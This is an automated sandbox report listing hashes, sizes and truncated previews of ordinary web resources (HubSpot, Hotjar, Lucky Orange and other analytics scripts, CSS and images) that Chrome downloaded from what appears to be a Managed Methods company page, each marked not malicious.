                                                                                                                                                                                                                                                                                                                                                                          SHA-512:48AF10EC9928D7C377EDFEC52DEBE1867D72DF45CA6B83F26A90D9B062BA52C1554227A74500C9B4382A2E443C19D3CDA459E7CE04D39EA6E490051A5D5D9BC5
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:window.hjSiteSettings = window.hjSiteSettings || {"site_id":1110137,"rec_value":1.0,"state_change_listen_mode":"automatic","record":true,"continuous_capture_enabled":true,"recording_capture_keystrokes":false,"session_capture_console_consent":false,"anonymize_digits":false,"anonymize_emails":false,"suppress_all":false,"suppress_all_on_specific_pages":[],"suppress_text":false,"suppress_location":false,"user_attributes_enabled":false,"legal_name":"Managed Methods, Inc.","privacy_policy_url":"https://managedmethods.com/privacy-policy/","deferred_page_contents":[],"record_targeting_rules":[],"feedback_widgets":[],"heatmaps":[],"polls":[],"integrations":{"optimizely":{"tag_recordings":false},"abtasty":{"tag_recordings":false},"kissmetrics":{"send_user_id":false},"mixpanel":{"send_events":false},"unbounce":{"tag_recordings":false},"hubspot":{"enabled":true,"send_recordings":false,"send_surveys":true}},"features":["ask.popover_redesign","client_script.compression.pc","error_reporting","feedbac
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1243), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1243
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.132002213580923
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:BG/Bn68bKG20eOV0R2C1TT+RoRMd7usc1b0c33Z0nhLz4qaoVXKakhp:B0bY0ek08sii+hhLjVCH
                                                                                                                                                                                                                                                                                                                                                                          MD5:61CA66DE658CAB9587E4636894680D5D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:047E17B37C12CBB9DC8AD2B5CD0201A7C65E9F53
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8DA927B6B1240FFCA4323FBB2A12C8E5ABB541040965C2BC5B7D09A2EB963B02
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F178001D53C5E86D30E224FECF99B17ED1AA4AC704BF0B6BFC4E4B79F0184A4285C179EAB7602BDFA4F701BE9CD837AD4BE56DC560F7B174B8FC82082E9C6B58
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:"use strict";function hs_i18n_log(n){console.log("i18n_getmessage: "+n)}function hs_i18n_substituteStrings(n,e){var s=n.match(new RegExp("\\$[0-9]+","g"));if(null==s)return n;for(var r=0;r<s.length;r++){var l=s[r],t=parseInt(l.replace("$",""));t<=0||null==e||t>e.length?hs_i18n_log("no substitution string at index "+t+" found for string '"+n+"'"):n=n.replace(l,e[t-1])}return n}function hs_i18n_insertPlaceholders(n,e){var s=n.message,r=s.match(new RegExp("\\$\\w+\\$","g"));if(null==r)return s;for(var l=0;l<r.length;l++){var t=r[l],o=t.replace(new RegExp("\\$","g"),"").toLowerCase(),a=n.placeholders[o];null==a&&hs_i18n_log("no placeholder found for '"+o+"'");s=s.replace(t,a.content)}return(s=hs_i18n_substituteStrings(s,e)).replace(/\$\$/g,"$")}function hs_i18n_getMessage(n,e){if(null==n){hs_i18n_log("no messages found");return""}var s=arguments[2];if(null==s||0==s.length||null==s[0]){hs_i18n_log("no message name passed");return""}var r=s[0],l=e.split("-")[0],t=n[e]||n[l];if(null==t){hs_i1
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 12955
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4675
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.957112634380581
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:oK/gBUvOV6xbI9WVByen2NmOfnUDfuC4+cbGtZu:/kMnYmJmf+ze
                                                                                                                                                                                                                                                                                                                                                                          MD5:CF826C613CA8817220B27EE016010218
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9A2B63FA4508E1C2D57D73826749DBBE3E3D79B5
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6ECD16D6E4A1F40CC6A62EC9F8672AF0204AFD4EF4B01CAEEB4550706822F039
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F3B9B90963F8FEC9F602139CE53EBEE50D4B3258A34C216DAAEC61ED25D6237CA5E3A24D7471C8F7F34850C953C168242C4EE1C0634F255C81696B50850AF662
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tools.luckyorange.com/core/lo.js?site-id=759fd941
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........Z.s.8..W$.....L...aT...;'v.3{W.h]0.Y.P....d...5..^I.&?\....n.....Y)..)........=..d..b"......yV..h.M.L........f......)5...P|^*m..M.15..,RA....3Zo6.j..I..sO.s......y...m.j.....d......_..d.,.OOWw....S1...j).Y.ak!.........&R....t..+....~lVK.f....N.....1:.....`pl......."b.TZ.m...dv{+.jX=.?t.x.xq6g.3.x"&.....S.....'.e.n..'1.._...N.#UqE\..7.e.......8B...Zx...+q....-A..K+d...IQ....z..O0..n.L...@.~.f.d$.}...v.hW.+.7..F....0. ...vj.H.....Z.EL.s^\=.ZX..h......$.[.g....>..W.6.OX..Y...J..k..L..#...l.(.3...c?.dJ..(hPF..*..'...:~.H.c..p....1..5..)..8bi.0...._....*K{.~.vN...M....../|3..'.c.X....'.B.K.....]fZ.!.ff-!..5ca.d....../......5..N....\.e..Q.5>..x_.x.K...2_y<..z.s...s.E.%..n....MP.U......A...s.i7Fi~...@W.....W....FC<..P.0.......}....2........W3....W.g....=}v"l.....?..t...BD;.....\}..........2..e*.x!x=....a...z.*.............:C.5iGYe...L....Tn#.=..`.....tE.,....V...3..v.2.h..4...-xQj....!..y....B....j.j*..\p..[.4n.$.lE.......g*
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):265
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.786898456013596
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:6BLbdYEx2LmWpK3sT2Y3xqsM0CRK1ZfLnLK4:6P1x2DvTLxhxzLn
                                                                                                                                                                                                                                                                                                                                                                          MD5:2F914C82522752597F2F0823DB23A838
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EEFA99B81B3D38A6E92EE7DDD671FC8E21B27950
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:AA5439E1D8150AD11A275E03A196535154A32AAC6D13A255C861B83368407C31
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:11E1F64BA9562BD34875C751F64BCCDEEDD0EE9B6B2D8FBC2E6A27BA660F0ADCE826B9866A5B79C66167CEB007A13A870C3E9731DE11810135FBEB04FFD04DAF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hs-fs/hub/6834707/hub_generated/module_assets/25372454157/1581034302168/module_25372454157_Button.min.css
                                                                                                                                                                                                                                                                                                                                                                          Preview:@import url('https://www.w3schools.com/w3css/4/w3.css');.custom-btn{border:0;display:inline-block;padding:8px 16px;vertical-align:middle;overflow:hidden;text-decoration:none;color:inherit;background-color:inherit;text-align:center;cursor:pointer;white-space:nowrap}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:V:V
                                                                                                                                                                                                                                                                                                                                                                          MD5:E0AA021E21DDDBD6D8CECEC71E9CF564
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9CE3BD4224C8C1780DB56B4125ECF3F24BF748B7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:565339BC4D33D72817B583024112EB7F5CDF3E5EEF0252D6EC1B9C9A94E12BB3
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:900110C951560EFF857B440E89CC29F529416E0E3B3D7F0AD51651BFDBD8025B91768C5ED7DB5352D1A5523354CE06CED2C42047E33A3E958A1BBA5F742DB874
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:OK
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.9889227488523016
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CUdrllHh/:HJ/
                                                                                                                                                                                                                                                                                                                                                                          MD5:28D6814F309EA289F847C69CF91194C6
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0F4E929DD5BB2564F7AB9C76338E04E292A42ACE
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:8337212354871836E6763A41E615916C89BAC5B3F1F0ADF60BA43C7C806E1015
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:1D68B92E8D822FE82DC7563EDD7B37F3418A02A89F1A9F0454CCA664C2FC2565235E0D85540FF9BE0B20175BE3F5B7B4EAE1175067465D5CCA13486AAB4C582C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:GIF89a.............,...........D..;
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                                                          MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://td.doubleclick.net/td/ga/rul?tid=G-KLDE7YGZXK&gacid=1437732794.1728897184&gtm=45je4a90v879629933z8810608771za200zb810608771&dma=0&gcs=G111&gcd=13r3r3r3r5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101671035~101686685&z=411358905
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (61243)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):62767
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.430308718778823
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:z3eubbg0RqsMNflThgnO5AEC09hgjWSQlImb5xthOE8pQPJJ3J7rfrLEoXHNajn3:zuubbg0Rq9t5Xai0mb5xFhpS2lVr54R
                                                                                                                                                                                                                                                                                                                                                                          MD5:4D5B14E9F856D3011ADE8F5B5248C06A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CB7C7A96E1E14E615405080CC10924DE8C8A26B4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:04A0576E3BF89D20E7155DD8EEE5B2BEB2131A8C3417AC7BE11F06AA8ADF4757
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:98A285D10805E32E07BDEB5A68F9D7839A54D7AC835E24988B7960F393C1E9134B574B0E76FD1D351EB5A8C528C43C604C957B970BDE1B2BCDB36B07AD66E22E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://js.hs-banner.com/6834707.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:var _hsp = window['_hsp'] = window['_hsp'] || [];._hsp.push(['setCookiePolicy', [{"portalId":6834707,"id":421619,"domain":null,"path":"/hubspot-analytics-default-policy","label":null,"enabled":true,"privacyPolicy":1,"privacyHideDecline":false,"privacyDefault":true,"privacyPolicyWording":"<p>This website uses cookies to collect information about how you interact with our website and allow us to remember you. We use this information in order to improve and customize your browsing experience and for analytics and metrics about our visitors both on this website and other media. To learn more, please see our <a href=\"https://managedmethods.com/privacy-policy/\" rel=\"nofollow\" target=\"_blank\">Privacy Policy</a>.</p>","privacyAcceptWording":"Accept","privacyDismissWording":"Decline","privacyDisclaimerWording":null,"privacyBannerAccentColor":"#3d7edb","privacyBannerType":"BOTTOM","cookiesByCategory":null,"targetedCountries":[],"showCloseButton":true}]]);._hsp.push(['addCookieDomain', '.ma
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (13757), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):13757
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.285406737717651
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:obEBqTW5Wwpk27NquCLgb2NIIYZQMc8/6SCK:ogBB5Wwpj7IuCLzNUXcUBJ
                                                                                                                                                                                                                                                                                                                                                                          MD5:F667E53D5752EE2E5759F3DFAF20D330
                                                                                                                                                                                                                                                                                                                                                                          SHA1:2225156FA65A34892F721DEFEA3EB480EBB32044
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CB5224674E43D02DB0037517F4AA29BA5CE9DDD0672E513CC7289714BA657522
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C7EF7AB258D8D8A1412350B828C7B3E800072A3A1800BD9D856A375ADEF850715EBDD65D0B80F07BD1203F09C1F5AFB6C00168B9379E67E6E6D5B31957712A1F
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://static.hsappstatic.net/content-cwv-embed/static-1.1293/embed.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(){"use strict";const t="/_hcms/perf/v2",e=window,n=Math.pow(2,31);var i={mode:"compressed",staticDomainPrefix:"//static.hsappstatic.net",bender:{depVersions:{"content-cwv-embed":"static-1.1293","browserslist-config-hubspot":"static-1.114",csstype:"static-1.8","head-dlb":"static-1.1074",HeadJS:"static-2.440","hoist-non-react-statics":"static-3.9","hs-test-utils":"static-1.3276","hub-http":"static-1.2011","hub-http-janus":"static-1.493","hub-http-rxjs":"static-1.463",HubStyleTokens:"static-2.6808",jasmine:"static-4.425","jasmine-runner":"static-1.1821","metrics-js":"static-1.4705",msw:"static-1.39",quartz:"static-1.2288",react:"static-7.123","react-dom":"static-7.85","react-redux":"static-7.16",redux:"static-4.16","redux-thunk":"static-2.17",rxjs:"static-5.10",StyleGuideUI:"static-3.401","testing-library":"static-1.99","webpack-env":"static-1.4",enviro:"static-4.230","hs-promise-rejection-tracking":"static-1.903",PortalIdParser:"static-2.218",raven:"static-3.863","raven-hubspot
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (574)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):19456
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.368070514046372
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:QlRIR3d1518qUT2nq+ZMOF1JXCtRgyeiyMQ6gTHwufvzlpszzLX1pDox4prZPGOb:QyJ18qUCFXXHkgphEfX1Fox4BZuOp1dt
                                                                                                                                                                                                                                                                                                                                                                          MD5:3F62449B84EE9485831C4C1726CDDD3B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8211B1E0C4DFB4D3AD7EE8A53D02F12B9503B06A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3DB5FC063868D3CA5FC3CC2695F483266CFFEA00BEF68DFFD7E4944B947AACC8
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6ECEC6EC6AB4DF78BDA57C1873ED9B88B2CEBCBCDA730B5E2FDE6A68576798DA60A4006DD3E941A8CE0E48CE64236E1411C6435363BC420897E502B20ACE3977
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://cdn.tynt.com/afwu.js
                                                                                                                                                                                                                                                                                                                                                                          Preview://v185 Copyright (c) 2008-2023 33Across Inc. All Rights Reserved..Tynt=window.Tynt||[];.(function(){var d=window,m=document,h={distro:"AFWU",id:"AFWU-"+(new Date).getTime()};Tynt.AFWUL=!0;Date.now||(Date.now=function(){return(new Date).getTime()});var e={_maxRef:600,_idMacro:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",init:function(){this._icUrl=h.protocol+(Tynt.e||"")+"ic.tynt.com";this._debUrl=h.protocol+(Tynt.e||"")+"de.tynt.com/deb/v2";this._sicUrl=h.protocol+(Tynt.e||"")+"cdn-sic.33across.com/1/javascripts/sic.js";this._apUrl=h.protocol+(Tynt.e||"")+"cdn-ap.33across.com/javascripts/ap.js";.this._chmob=this._chua=this._chuav=this._chm=this._chpv=this._chp="";this.init.fbl=function(a,c){if(c)for(var g=0;g<c.length;++g)0<g&&(e[a]+=", "),e[a]+=c[g].brand+";v="+c[g].version};var a=navigator.userAgentData;"undefined"!=typeof a&&("undefined"!=typeof a.getHighEntropyValues&&(this._chpv="pending",a.getHighEntropyValues(["model","platformVersion","fullVersionList"]).then(function(a
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):93882
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.525806139710871
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:jhAMDfvqnBZZCx9sTJ2tdNkCIJDMvk+jnDbUgO5RhA+Kgqr5H0KtoaskDb1T16Ze:ZfvySn6RqzuSR1MPIN6Y1dNQwkp2hR
                                                                                                                                                                                                                                                                                                                                                                          MD5:CBF40F4D575CEA01322E310AD869AFDE
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FEAA20EE35497633F0D5011C5FB9B82AF54986FC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2CAB0419B164DCC4F088F1E0A7323A1946392D5FAB985BBE28DEE6CBD64968BC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:CF1A32C43E74BB19D41FC7FD4DF10FF752BCADC5E144054A073E6418824E9B3B4D1F51938D13034489F9EC13125AD3605279ADFA2568E757E44BF442200EEE56
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://js.usemessages.com/conversations-embed.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(e){var t={};function i(s){if(t[s])return t[s].exports;var n=t[s]={i:s,l:!1,exports:{}};e[s].call(n.exports,n,n.exports,i);n.l=!0;return n.exports}i.m=e;i.c=t;i.d=function(e,t,s){i.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:s})};i.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"});Object.defineProperty(e,"__esModule",{value:!0})};i.t=function(e,t){1&t&&(e=i(e));if(8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var s=Object.create(null);i.r(s);Object.defineProperty(s,"default",{enumerable:!0,value:e});if(2&t&&"string"!=typeof e)for(var n in e)i.d(s,n,function(t){return e[t]}.bind(null,n));return s};i.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};i.d(t,"a",t);return t};i.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)};i.p="//static.hsappstatic.net/conversations-embed/static-1.18322/";i(i.s=0)}([function(e,t,i){"use strict"
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 48x48, 32 bits/pixel
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9662
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.362647679661637
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:8RCJlIv7hEPKjRYlftXbmOS++HOEyDu+:oCJlIlE6RYlf7F+uBDu+
                                                                                                                                                                                                                                                                                                                                                                          MD5:9FAFB91660F4C2E3052C947C09A9C6A2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5C8F39AB440EE85F74BE231B3D32946BCE8A2D0E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:26462C7913EACE7E031CC620772FDE257B62F1D9AFB200F9FE4CCB102A839EFA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:F8D30A742F97B27610F0653E4E779A6A9A4566B8B4A9D7E2BE605D0CDE6403ACB48B512D005A1B19DFD950EDED1482ACD0C5FE94521674FE21AA56D0FA9BAC3B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:......00.... ..%......(...0...`..... ......%............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1350
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4580894810019975
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:kogDYkvold+2ydFpLclLSxtio5/6LKdaLZuCqLLZ5QaLZq8LZRcnZvD0lfyqE:dPU755qRmiGzuZvQty3
                                                                                                                                                                                                                                                                                                                                                                          MD5:DDB7EDBD18A4A0677C39B5428AC23E26
                                                                                                                                                                                                                                                                                                                                                                          SHA1:718AD92A1D7F1A9B6E78832AA2B7DD619758610B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:951DCD706BAA5CB846DBB13A7D9489DE8EEDC516B05A700F03E37957C9D9CB34
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:61974C2BCEF92142ABD107B89C4740EB6146D50635E295755EEAC2B5F89FAC8F2738582EBACB8ECE6B9F3193A426727CF8A413613AE9EDDC91A279AE7FABFE4D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://t.dtscout.com/idg/?su=1040172889715587758A2B28B3F6BBD2
                                                                                                                                                                                                                                                                                                                                                                          Preview:<html><head></head><body><script>.window.onload = function() {. var uid_g = '1040172889715587758A2B28B3F6BBD2'; . var uid_s = '104017288971566B2504FC99BFD05FEF'; . var uid_su = '1040172889715587758A2B28B3F6BBD2';.. var debug = {};. var pass_uid = false;. var method = false;.. if(uid_g && uid_g.length > 0) {. method = "got";. pass_uid = uid_g;. } else if(uid_su && uid_su.length > 0) {. method = "setu";. pass_uid = uid_su;. } else if(uid_s.length > 0) {. method = "set";. pass_uid = uid_s;. }.. debug.pass_method = method;. debug.pass_uid = pass_uid;.. var ls_uid = null;. try {. var ls_uid = localStorage.getItem('uid');. debug.ls_uid = ls_uid;.. var uid = false. if(method == 'got') {. uid = pass_uid;. debug.uid_src = 'got';. } else if(ls_uid) {. uid = ls_uid;. debug.uid_src = 'ls';. } else {. uid = pass_uid;.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):135
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.936163260345646
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YVKBEivEXoMRL2KIhfwcP2xR2GXEqRWJ6jLZHJqCUXPTY:YihgbU2mn6jLZp3SU
                                                                                                                                                                                                                                                                                                                                                                          MD5:8AA89D38A2211D124A514A95BF9B8D85
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3159B0509A1C4EC4335152271FC6E85B26CAF6E4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5290C77870302BFFEE5B30D68B9F14869CA04C1AF0E6D1BA3D63DD52613494B9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9CD4F95ABDA664C2D807DE67F9980FED2559AE12D46AB879EB9E0522FF41D03795F4A74A6EFCABD7B9C8E47E4A74EB63FC06B1ECE825171D0AF937A3527FD740
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://forms.hscollectedforms.net/collected-forms/v1/config/json?portalId=6834707&utk=
                                                                                                                                                                                                                                                                                                                                                                          Preview:{"portalId":6834707,"submissionsApiDomain":"forms.hubspot.com","reportScraperTest":false,"formCaptureEnabled":true,"token":-1954512136}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 2097
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1190
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.831312491646247
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:XwmOHj7FVa/ZK+kNJuGiSdAzvMuUMeXhDFW82swoydY/:Xn4a/ZK1Tj+vMzTW82sLP
                                                                                                                                                                                                                                                                                                                                                                          MD5:80D8F4DD25F0D41FC0638E5641734EFE
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9348E64DC4784919748B31B2EFBF2AFF3CCA21C8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:5E4217B5E343E7F92E36EF0FD485DCDEC6D9801076EDADCED8F6756C94CCA7AA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:3C674DFD3A8E2586AA80B41B03889C9D6E9E522881F8ABE255838FCE1828D309F6C83824504541AC54F813312F80C79471F5EF9A95912BDD6FE791373FB081B9
